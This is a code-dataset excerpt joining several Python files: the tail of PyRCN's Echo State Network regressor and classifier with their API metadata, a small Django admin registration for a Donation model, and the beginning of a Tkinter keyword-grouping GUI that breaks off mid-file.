self._input_to_node\n\n @input_to_node.setter\n def input_to_node(self, input_to_node: InputToNode) -> None:\n \"\"\"\n Set the input_to_node Estimator.\n\n Parameters\n ----------\n input_to_node : InputToNode\n \"\"\"\n self._input_to_node = input_to_node\n\n @property\n def node_to_node(self) -> NodeToNode:\n \"\"\"\n Return the node_to_node Transformer.\n\n Returns\n -------\n node_to_node : NodeToNode\n \"\"\"\n return self._node_to_node\n\n @node_to_node.setter\n def node_to_node(self, node_to_node: NodeToNode) -> None:\n \"\"\"\n Set the node_to_node Transformer.\n\n Parameters\n ----------\n node_to_node : NodeToNode\n \"\"\"\n self._node_to_node = node_to_node\n\n def hidden_layer_state(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Return the hidden_layer_state, e.g. the reservoir state over time.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n\n Returns\n -------\n hidden_layer_state : ndarray of (n_samples,)\n The hidden_layer_state, e.g. the reservoir state over time.\n \"\"\"\n if self._input_to_node is None:\n raise NotFittedError(self)\n\n if self.requires_sequence is False:\n # input_to_node\n hidden_layer_state = self._input_to_node.transform(X)\n hidden_layer_state = self._node_to_node.transform(\n hidden_layer_state)\n else:\n hidden_layer_state = np.empty(shape=X.shape, dtype=object)\n for k, seq in enumerate(X):\n # input_to_node\n hls = self._input_to_node.transform(seq)\n hls = self._node_to_node.transform(hls)\n hidden_layer_state[k] = hls\n return hidden_layer_state\n\n @property\n def sequence_to_value(self) -> bool:\n \"\"\"\n Return the sequence_to_value parameter.\n\n Returns\n -------\n sequence_to_value : bool\n \"\"\"\n return self._sequence_to_value\n\n @sequence_to_value.setter\n def sequence_to_value(self, sequence_to_value: bool) -> None:\n \"\"\"\n Set the sequence_to_value parameter.\n\n Parameters\n ----------\n sequence_to_value : bool\n \"\"\"\n self._sequence_to_value = sequence_to_value\n\n @property\n def decision_strategy(self) -> Literal[\"winner_takes_all\",\n \"median\", \"last_value\"]:\n \"\"\"\n Return the decision_strategy parameter.\n\n Returns\n -------\n decision_strategy : Literal[\"winner_takes_all\", \"median\", \"last_value\"]\n \"\"\"\n return self._decision_strategy\n\n @decision_strategy.setter\n def decision_strategy(self, decision_strategy: Literal[\"winner_takes_all\",\n \"median\",\n \"last_value\"])\\\n -> None:\n \"\"\"\n Set the requires_sequence parameter.\n\n Parameters\n ----------\n decision_strategy : Literal[\"winner_takes_all\", \"median\", \"last_value\"]\n \"\"\"\n self._decision_strategy = decision_strategy\n\n @property\n def requires_sequence(self) -> Union[Literal[\"auto\"], bool]:\n \"\"\"\n Return the requires_sequence parameter.\n\n Returns\n -------\n requires_sequence : Union[Literal[\"auto\"], bool]\n \"\"\"\n return self._requires_sequence\n\n @requires_sequence.setter\n def requires_sequence(self,\n requires_sequence: Union[Literal[\"auto\"], bool])\\\n -> None:\n \"\"\"\n Set the requires_sequence parameter.\n\n Parameters\n ----------\n requires_sequence : Union[Literal[\"auto\"], bool]\n\n \"\"\"\n self._requires_sequence = requires_sequence\n\n\nclass ESNClassifier(ESNRegressor, ClassifierMixin):\n \"\"\"\n Echo State Network classifier.\n\n This model optimizes the mean squared error loss function using\n linear regression.\n\n Parameters\n ----------\n input_to_node : Optional[InputToNode], default=None\n Any ```InputToNode``` object that transforms the inputs.\n If ```None```, a ```pyrcn.base.blocks.InputToNode```\n object is instantiated.\n node_to_node : Optional[NodeToNode], default=None\n Any ```NodeToNode``` object that transforms the outputs of\n ```input_to_node```.\n If ```None```, a ```pyrcn.base.blocks.NodeToNode()```\n object is instantiated.\n regressor : Union[IncrementalRegression, LinearModel, None], default=None\n Regressor object such as derived from ``LinearModel``. This\n regressor will automatically be cloned each time prior to fitting.\n If ```None```, a ```pyrcn.linear_model.IncrementalRegression()```\n object is instantiated.\n requires_sequence : Union[Literal[\"auto\"], bool], default=\"auto\"\n If True, the input data is expected to be a sequence.\n If \"auto\", tries to automatically estimate when calling ```fit```\n for the first time\n decision_strategy : Literal[\"winner_takes_all\", \"median\", \"last_value\"],\n default='winner_takes_all'\n Decision strategy for sequence-to-label task.\n Ignored if the target output is a sequence\n verbose : bool = False\n Verbosity output\n kwargs : Any, default = None\n keyword arguments passed to the subestimators if this is desired.\n \"\"\"\n\n @_deprecate_positional_args\n def __init__(self, *,\n input_to_node: Optional[InputToNode] = None,\n node_to_node: Optional[NodeToNode] = None,\n regressor: Union[IncrementalRegression,\n LinearModel, None] = None,\n requires_sequence: Union[Literal[\"auto\"], bool] = \"auto\",\n decision_strategy: Literal[\"winner_takes_all\", \"median\",\n \"last_value\"] = \"winner_takes_all\",\n verbose: bool = False,\n **kwargs: Any) -> None:\n \"\"\"Construct the ESNClassifier.\"\"\"\n super().__init__(input_to_node=input_to_node,\n node_to_node=node_to_node, regressor=regressor,\n requires_sequence=requires_sequence, verbose=verbose,\n **kwargs)\n self._decision_strategy = decision_strategy\n self._encoder = LabelBinarizer()\n self._sequence_to_value = False\n\n def partial_fit(self, X: np.ndarray, y: np.ndarray,\n transformer_weights: Optional[np.ndarray] = None,\n postpone_inverse: bool = False,\n classes: Optional[np.ndarray] = None) -> ESNClassifier:\n \"\"\"\n Fit the regressor partially.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n y : ndarray of shape (n_samples,) or (n_samples, n_targets)\n The targets to predict.\n classes : Optional[np.ndarray], default=None\n Classes across all calls to partial_fit.\n Can be obtained via `np.unique(y_all)`, where y_all is the\n target vector of the entire dataset.\n This argument is required for the first call to partial_fit\n and can be omitted in the subsequent calls.\n Note that y doesn't need to contain all labels in `classes`.\n transformer_weights : Optional[ndarray], default=None\n ignored\n postpone_inverse : bool, default=False\n If the output weights have not been fitted yet, regressor might be\n hinted at postponing inverse calculation. Refer to\n IncrementalRegression for details.\n\n Returns\n -------\n self : returns a trained ESNClassifier model\n \"\"\"\n self._validate_data(X, y, multi_output=True)\n self._encoder.fit(classes)\n super().partial_fit(X, self._encoder.transform(y),\n transformer_weights=None,\n postpone_inverse=postpone_inverse)\n return self\n\n def fit(self, X: np.ndarray, y: np.ndarray,\n n_jobs: Union[int, np.integer, None] = None,\n transformer_weights: Union[None,\n np.ndarray] = None) -> ESNClassifier:\n \"\"\"\n Fit the classifier.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features) or of shape (n_sequences,)\n y : ndarray of shape (n_samples,) or (n_samples, n_classes)\n or of shape (n_sequences)\n The targets to predict.\n n_jobs : int, default=None\n The number of jobs to run in parallel. ```-1``` means using all\n processors.\n See :term:`Glossary ` for more details.\n transformer_weights : ignored\n\n Returns\n -------\n self : Returns a trained ESNClassifier model.\n \"\"\"\n self._validate_hyperparameters()\n if self.requires_sequence == \"auto\":\n self._check_if_sequence(X, y)\n if self.requires_sequence:\n self._input_to_node.fit(X[0])\n self._node_to_node.fit(self._input_to_node.transform(X[0]))\n self._check_if_sequence_to_value(X, y)\n X, y, sequence_ranges = concatenate_sequences(\n X, y, sequence_to_value=self._sequence_to_value)\n else:\n self._validate_data(X, y, multi_output=True)\n self._input_to_node.fit(X)\n self._node_to_node.fit(self._input_to_node.transform(X))\n self._encoder = LabelBinarizer().fit(y)\n y = self._encoder.transform(y)\n # self._regressor = self._regressor.__class__()\n if self.requires_sequence:\n return self._sequence_fit(X, y, sequence_ranges, n_jobs)\n else:\n super().partial_fit(X, y)\n return self\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Predict the classes using the trained ```ESNClassifier```.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n The input data.\n\n Returns\n -------\n y_pred : ndarray of shape (n_samples,) or (n_samples, n_classes)\n The predicted classes.\n \"\"\"\n y = super().predict(X)\n if self.requires_sequence and self._sequence_to_value:\n for k, _ in enumerate(y):\n y[k] = MatrixToValueProjection(\n output_strategy=self._decision_strategy)\\\n .fit_transform(y[k])\n return y\n elif self.requires_sequence:\n for k, _ in enumerate(y):\n y[k] = self._encoder.inverse_transform(y[k], threshold=None)\n return y\n else:\n return self._encoder.inverse_transform(super().predict(X),\n threshold=None)\n\n def predict_proba(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Predict the probability estimated using a trained ```ESNClassifier```.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n The input data.\n\n Returns\n -------\n y_pred : ndarray of shape (n_samples,) or (n_samples, n_classes)\n The predicted probability estimates.\n \"\"\"\n y = super().predict(X)\n if self.requires_sequence and self._sequence_to_value:\n for k, _ in enumerate(y):\n y[k] = MatrixToValueProjection(\n output_strategy=self._decision_strategy, needs_proba=True)\\\n .fit_transform(y[k])\n y[k] = np.clip(y[k], a_min=1e-5, a_max=None)\n return y\n elif self.requires_sequence:\n for k, _ in enumerate(y):\n y[k] = np.clip(y[k], a_min=1e-5, a_max=None)\n return y\n else:\n return np.asarray(np.clip(y, a_min=1e-5, a_max=None))\n\n def predict_log_proba(self, X: np.ndarray) -> np.ndarray:\n \"\"\"\n Predict the log probability estimated using a trained\n ```ESNClassifier```.\n\n Parameters\n ----------\n X : ndarray of shape (n_samples, n_features)\n The input data.\n\n Returns\n -------\n y_pred : ndarray of shape (n_samples,) or (n_samples, n_classes)\n The predicted logarithmic probability estimated.\n \"\"\"\n if self.requires_sequence:\n y = self.predict_proba(X=X)\n for k, _ in enumerate(y):\n y[k] = np.log(y[k])\n return y\n else:\n return np.log(self.predict_proba(X=X))\n", "repo_name": "TUD-STKS/PyRCN", "sub_path": "src/pyrcn/echo_state_network/_esn.py", "file_name": "_esn.py", "file_ext": "py", "file_size_in_byte": 31831, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 79, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.version_info", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 30, "usage_type": "name"}, {"api_name": "sklearn.base.MultiOutputMixin", "line_number": 30, "usage_type": "name"}, {"api_name": "sklearn.base.RegressorMixin", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 70, "usage_type": "name"}, {"api_name": "base.blocks.InputToNode", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 71, "usage_type": "name"}, {"api_name": "base.blocks.NodeToNode", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 72, "usage_type": "name"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 72, "usage_type": "name"}, {"api_name": "sklearn.linear_model._base.LinearModel", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 74, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 74, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 78, "usage_type": "name"}, {"api_name": "base.blocks.InputToNode", "line_number": 81, "usage_type": "call"}, {"api_name": "base.blocks.InputToNode", "line_number": 82, "usage_type": "call"}, {"api_name": "base.blocks.NodeToNode", "line_number": 91, "usage_type": "call"}, {"api_name": "base.blocks.NodeToNode", "line_number": 92, "usage_type": "call"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 101, "usage_type": "call"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.utils.validation._deprecate_positional_args", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 186, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 232, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 233, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 233, "usage_type": "attribute"}, {"api_name": "sklearn.exceptions.NotFittedError", "line_number": 260, "usage_type": "name"}, {"api_name": "sklearn.exceptions.NotFittedError", "line_number": 270, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 289, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 290, "usage_type": "name"}, {"api_name": "numpy.integer", "line_number": 290, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 291, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 291, "usage_type": "attribute"}, {"api_name": "util.concatenate_sequences", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 329, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 330, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 331, "usage_type": "name"}, {"api_name": "numpy.integer", "line_number": 331, "usage_type": "attribute"}, {"api_name": "joblib.Parallel", "line_number": 353, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 353, "usage_type": "call"}, {"api_name": "sklearn.base.clone", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 373, "usage_type": "attribute"}, {"api_name": "sklearn.exceptions.NotFittedError", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 397, "usage_type": "call"}, {"api_name": "sklearn.base.is_regressor", "line_number": 430, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 445, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 446, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 449, "usage_type": "name"}, {"api_name": "sklearn.linear_model._base.LinearModel", "line_number": 449, "usage_type": "name"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 449, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 460, "usage_type": "name"}, {"api_name": "sklearn.linear_model._base.LinearModel", "line_number": 460, "usage_type": "name"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 461, "usage_type": "name"}, {"api_name": "base.blocks.InputToNode", "line_number": 472, "usage_type": "name"}, {"api_name": "base.blocks.InputToNode", "line_number": 483, "usage_type": "name"}, {"api_name": "base.blocks.NodeToNode", "line_number": 494, "usage_type": "name"}, {"api_name": "base.blocks.NodeToNode", "line_number": 505, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 515, "usage_type": "attribute"}, {"api_name": "sklearn.exceptions.NotFittedError", "line_number": 529, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 537, "usage_type": "call"}, {"api_name": "typing_extensions.Literal", "line_number": 568, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 594, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 594, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 606, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 606, "usage_type": "name"}, {"api_name": "sklearn.base.ClassifierMixin", "line_number": 619, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 658, "usage_type": "name"}, {"api_name": "base.blocks.InputToNode", "line_number": 658, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 659, "usage_type": "name"}, {"api_name": "base.blocks.NodeToNode", "line_number": 659, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 660, "usage_type": "name"}, {"api_name": "linear_model.IncrementalRegression", "line_number": 660, "usage_type": "name"}, {"api_name": "sklearn.linear_model._base.LinearModel", "line_number": 661, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 662, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 662, "usage_type": "name"}, {"api_name": "typing_extensions.Literal", "line_number": 663, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 666, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.LabelBinarizer", "line_number": 673, "usage_type": "call"}, {"api_name": "sklearn.utils.validation._deprecate_positional_args", "line_number": 656, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 676, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 677, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 677, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 679, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 679, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 713, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 714, "usage_type": "name"}, {"api_name": "numpy.integer", "line_number": 714, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 715, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 716, "usage_type": "attribute"}, {"api_name": "util.concatenate_sequences", "line_number": 743, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelBinarizer", "line_number": 749, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 758, "usage_type": "attribute"}, {"api_name": "projection.MatrixToValueProjection", "line_number": 775, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 787, "usage_type": "attribute"}, {"api_name": "projection.MatrixToValueProjection", "line_number": 804, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 807, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 814, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 814, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 816, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 834, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 837, "usage_type": "call"}]} +{"seq_id": "14592796915", "text": "# pylint: disable=R0904\n\nfrom django.contrib import admin\nfrom website.apwan.models.donation import Donation\n\n__author__ = 'Dean Gardiner'\n\n\nclass DonationAdmin(admin.ModelAdmin):\n list_display = (\n 'id', 'recipient', 'state', 'payer_name',\n 'amount', 'tip', 'currency'\n )\nadmin.site.register(Donation, DonationAdmin)\n", "repo_name": "FructusCode/website", "sub_path": "website/apwan/admin/donation.py", "file_name": "donation.py", "file_ext": "py", "file_size_in_byte": 338, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 14, "usage_type": "call"}, {"api_name": "website.apwan.models.donation.Donation", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "20861755841", "text": "#Standard Modules\nfrom Tkinter import *\nimport tkFileDialog\nfrom ScrolledText import *\nfrom collections import defaultdict\nimport csv\nimport os\n\n#Custom Modules\nfrom keywordGroupObject import word_grouper\nfrom Scraper import Suggest, Suggestions\n#import Suggestions\n\nclass ImportList(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\n\t\t#Frame for import canvas\n\t\tself.importListFrame = Frame(root, bg=\"gray\", borderwidth=1, width=75)\n\t\tself.importListFrame.pack(fill=BOTH, expand=True, side=LEFT)\n\n\t\t#Canvas for list of keywords\n\t\tlist1Canvas = Canvas(self.importListFrame, bg='gray', height=100, width=75)\n\t\tlist1Canvas.pack(fill=BOTH, expand=True, side=TOP)\n\n\t\t#Scrollbar for Import List\n\t\tlist1Scroll = Scrollbar(list1Canvas)\n\t\tlist1Scroll.pack(side=RIGHT, fill=Y)\n\n\t\t#The Import list is a listbox that will take the keywords imported from file\n\t\tself.importList = Listbox(list1Canvas, relief=FLAT, selectmode=\"extended\")\n\t\tself.importList.pack(fill=BOTH, expand=True, side=LEFT)\n\n\t\t#Set the scrolling for the ListBox\n\t\tself.importList.config(yscrollcommand=list1Scroll.set)\n\t\tlist1Scroll.config(command=self.importList.yview)\n\n\t\tself.importList.bind(\"\", self.parent.del_word_key)\n\nclass Buttons(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\n\t\t#Frame to hold buttons\n\t\tbuttonFrame = Frame(parent.importListFrame, bg=\"#E8E8E8\", relief=FLAT, borderwidth=2)\n\t\tbuttonFrame.pack(fill=BOTH, side=BOTTOM, anchor=SW)\n\n\t\t#Construct Button Frame Grid\n\t\tbuttonFrame.grid_rowconfigure(0, weight=1)\n\t\tbuttonFrame.grid_rowconfigure(1, weight=1)\n\n\t\tbuttonFrame.grid_rowconfigure(0, weight=1)\n\t\tbuttonFrame.grid_rowconfigure(1, weight=1)\n\n\t\tbutton1 = Button(buttonFrame, text=\"Get Keywords\", width=10, \n\t\t\thighlightbackground='#E8E8E8',command=self.parent.parent.fill_list)\n\t\tbutton1.grid(row=0, column=0, sticky=NW)\n\n\t\tbutton2 = Button(buttonFrame, text=\"Clear List\", width=10, \n\t\t\thighlightbackground='#E8E8E8',command=self.parent.parent.del_list)\n\t\tbutton2.grid(row=0, column=1, sticky=NE)\n\n\t\tbutton3 = Button(buttonFrame, text=\"Delete Item\", width=10, \n\t\t\thighlightbackground='#E8E8E8',command=self.parent.parent.del_word)\n\t\tbutton3.grid(row=1, column=0)\n\n\t\tbutton4 = Button(buttonFrame, text=\"Process\", width=10, \n\t\t\thighlightbackground='#E8E8E8',command=self.parent.parent.makeGroups)\n\t\tbutton4.grid(row=1, column=1)\n\n\nclass Groups(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\n\t\t#Frame for keyword groups\n\t\tgroupFrame = Frame(root, relief=RAISED, bg=\"#E8E8E8\")\n\t\tgroupFrame.pack(fill=BOTH, expand=True, side=LEFT, padx=50, pady=50)\n\n\t\tgroupHeader = Label(groupFrame,text='Keyword Groups', \n\t\t\t\tfont=(\"Helvetica\",24),pady=10, bg=\"#E8E8E8\")\n\t\tgroupHeader.pack(fill=BOTH, expand = True, side=TOP)\n\n\t\t#Canvas for keyword groups\n\t\tgroupCanvas = Canvas(groupFrame, bg='black', width=100, relief=SUNKEN)\n\t\tgroupCanvas.pack(fill=BOTH, expand=True, side=TOP)\n\n\t\t#Scrollbar for Group List\n\t\tgroupScroll = Scrollbar(groupCanvas, bg=\"#E8E8E8\")\n\t\tgroupScroll.pack(side=RIGHT, fill=Y)\n\n\t\t#The Group list is a listbox that will display the Keyword Group Dict\n\t\tself.groupList = Listbox(groupCanvas, bd=1, height=15, width=25, relief=SUNKEN)\n\t\tself.groupList.bind(\"<>\", self.parent.onselect)\n\n\t\t#Delete Key for Removing Keyword Groups\n\t\tself.groupList.bind(\"\", self.parent.del_group_key)\n\n\t\t#Double click to add keywords to selected group\n\t\tself.groupList.bind(\"\", self.parent.add_keyword_dc)\n\t\tself.groupList.pack(fill=BOTH, expand=True, side=LEFT)\n\n\t\t#Set the scrolling for the Keyword Groups\n\t\tself.groupList.config(yscrollcommand=groupScroll.set)\n\t\tgroupScroll.config(command=self.groupList.yview)\n\n\t\t#Delete Button\n\t\tgrpDel = Button(groupFrame, width=10, text=\"Delete Group\", highlightbackground=\"#E8E8E8\",\n\t\t\tcommand=self.parent.del_group)#command=lambda groupList=groupList: groupList.delete(ANCHOR))\n\t\tgrpDel.pack(side=BOTTOM)\n\n\t\t#Add Group Button that creates a pop up to add a group\n\t\tgrpAdd = Button(groupFrame, width=10, text=\"Add Group\", highlightbackground='#E8E8E8',\n\t\t\tcommand=parent.group_window)\n\t\tgrpAdd.pack(side=TOP)\n\nclass Keywords(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\n\t\tklFrame = Frame(root, relief=RAISED, bg=\"#E8E8E8\")\n\t\tklFrame.pack(fill=BOTH, expand=True, side=LEFT, padx=50, pady=50)\n\n\t\t#Header text for the keyword list \n\t\tklHeader = Label(klFrame,text='Keywords', \n\t\t\t\tfont=(\"Helvetica\",24),pady=10, bg=\"#E8E8E8\")\n\t\tklHeader.pack(fill=BOTH, expand = True, side=TOP)\n\n\t\t#Canvas for keyword groups\n\t\tklCanvas = Canvas(klFrame, bg='black', width=100, relief=SUNKEN)\n\t\tklCanvas.pack(fill=BOTH, expand=True)\n\n\t\t#Scrollbar for Group List\n\t\tkwScroll = Scrollbar(klCanvas)\n\t\tkwScroll.pack(side=RIGHT, fill=Y)\n\n\t\t#The Group list is a listbox that will display the Keyword Group Dict\n\t\tself.kwList = Listbox(klCanvas, bd=1, height=15, width=25, relief=SUNKEN, selectmode=\"extended\")\n\t\tself.kwList.bind(\"\",self.parent.del_kw_key)\n\t\tself.kwList.pack(fill=BOTH, expand=True, side=LEFT)\n\n\t\t#Set the scrolling for the Keyword Groups\n\t\tself.kwList.config(yscrollcommand=kwScroll.set)\n\t\tkwScroll.config(command=self.kwList.yview)\n\n\t\t#Delete kw Button\n\t\tkwDel = Button(klFrame, width=15, text=\"Delete Keyword\", highlightbackground=\"#E8E8E8\",\n\t\t\tcommand=self.parent.del_kw)#command=lambda kwList=kwList: kwList.delete(ANCHOR))\n\t\tkwDel.pack(side=BOTTOM)\n\n\t\t#Button to initiate popup to add keywords to group\n\t\taddKw = Button(klFrame, width=15, text=\"Add Keyword\", highlightbackground=\"#E8E8E8\",\n\t\t\tcommand=self.parent.keyword_window)\n\t\taddKw.pack(side=TOP)\n\nclass Add_Keywords(Frame):\n\tdef __init__(self, parent, app):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\t\tparent.title = \"Add Keywords\"\n\t\tself.app = app\n\n\t\t#Frame to hold keyword list text\n\t\tkwTextFrame = Frame(self.parent, bg=\"#E8E8E8\", relief=RAISED)\n\t\tkwTextFrame.pack(fill=BOTH, expand=True, side=LEFT, padx=10, pady=10)\n\n\t\t#Canvas for keyword list text\n\t\tkwgroupCanvas = Canvas(kwTextFrame, bg=\"#E8E8E8\", width=100, relief=SUNKEN)\n\t\tkwgroupCanvas.pack(fill=BOTH, expand=True)\n\n\t\t#Keyword list test box\n\t\tkwText = ScrolledText(kwgroupCanvas, wrap=WORD, width=25, \n\t\t\theight=15, relief=SUNKEN, highlightthickness=0, bd=1, padx=1, pady=1)\n\t\tkwText.pack(fill=BOTH, side=BOTTOM, expand=True)\n\n\t\t#@add_wrapper\n\t\tdef add_kw():\n\t\t\t#Find current group selected\n\t\t\t\tcurrent_word = self.app.group_select\n\n\t\t\t\t#Get text from add keywords text box\n\t\t\t\ttext = kwText.get('1.0', 'end-1c').splitlines()\n\t\t\t\tfor line in text:\n\t\t\t\t\tself.app.key_group.keyword_groups[current_word].append(line)\n\n\t\t\t\tkwText.delete('1.0',END)\n\t\t\t\treturn text\n\n\t\t#Add Keyword Button\n\t\tadd_key = Button(kwTextFrame, width=15, text=\"Add Keyword(s)\", \n\t\t\thighlightbackground=\"#E8E8E8\", command=add_kw)\n\t\tadd_key.pack(side=BOTTOM)\n\nclass Add_Group(Frame):\n\tdef __init__(self, parent, app):\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\t\tself.app = app\n\n\t\t#Frame to hold Keyword Group new Entry and new keywords text box\n\t\taddKGFrame = Frame(parent, bg=\"#E8E8E8\", relief=RAISED)\n\t\taddKGFrame.pack(fill=BOTH, expand=True, side=LEFT, padx=10, pady=10)\n\n\t\t#Label for Entry Box\n\t\taddGroupLabel = Label(addKGFrame, text=\"Enter New Group Name\",bg=\"#E8E8E8\")\n\t\taddGroupLabel.pack(side=TOP)\n\n\t\t#Entry Box for new Keyword Group\n\t\tself.addGroup = Entry(addKGFrame, width=30, relief=SUNKEN)\n\t\tself.addGroup.pack(side=TOP, fill=X, expand=True, pady=5)\n\n\t\t#Label for New Keywords for Group Text Box\n\t\taddKGLabel = Label(addKGFrame, text=\"Enter New Keywords (Optional)\",bg=\"#E8E8E8\")\n\t\taddKGLabel.pack(side=TOP, fill=X, expand=True, pady=5)\n\n\t\t#Canvas for Text Box to Enter New Keywords for New Group\n\t\taddKGCanvas = Canvas(addKGFrame, bg=\"#E8E8E8\", relief=SUNKEN)\n\t\taddKGCanvas.pack(side=TOP, fill=BOTH, expand=True, pady=5)\n\n\t\t#Keywords for new group scrollable text box\n\t\tself.addKGText = ScrolledText(addKGCanvas, wrap=WORD, width=25, \n\t\t\theight=15, relief=SUNKEN, highlightthickness=0, bd=1, padx=1, pady=1)\n\t\tself.addKGText.pack(fill=BOTH, side=TOP, expand=True)\n\n\t\t#Button to add new Keyword Group and Keywords\n\t\taddKGButton = Button(addKGFrame, text=\"Add Group\", \n\t\t\twidth=30, highlightbackground='#E8E8E8', command=self.group_add)\n\t\taddKGButton.pack(side=TOP, fill=BOTH, expand=True)\n\n\t#Function to add the keyword group\n\tdef group_add(self):\n\t\tnewGroup = self.addGroup.get()\n\t\tif newGroup != \"\":\n\t\t\tself.app.key_group.keyword_groups[newGroup] = []\n\n\t\t\ttext = self.addKGText.get('1.0', 'end-1c').splitlines()\n\t\t\tfor line in text:\n\t\t\t\tself.app.key_group.keyword_groups[newGroup].append(line)\n\t\t\tself.app.Groups.groupList.delete(0, END)\n\t\t\tfor x in self.app.key_group.keyword_groups:\n\t\t\t\tself.app.Groups.groupList.insert(END, '%s' % x)\n\n\t\t\tself.addKGText.delete('1.0', END)\n\t\t\tself.addGroup.delete(0, END)\n\nclass MainApplication(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\t\tself.Import = ImportList(self)\n\t\tself.Buttons = Buttons(self.Import)\n\t\tself.Groups = Groups(self)\n\t\tself.Keywords = Keywords(self)\n\t\tself.parent = parent\n\t\tself.menubar = Menu(self)\n\t\tself.parent.config(bg=\"#E8E8E8\")\n\n\t#HELPER VARIBLES AND 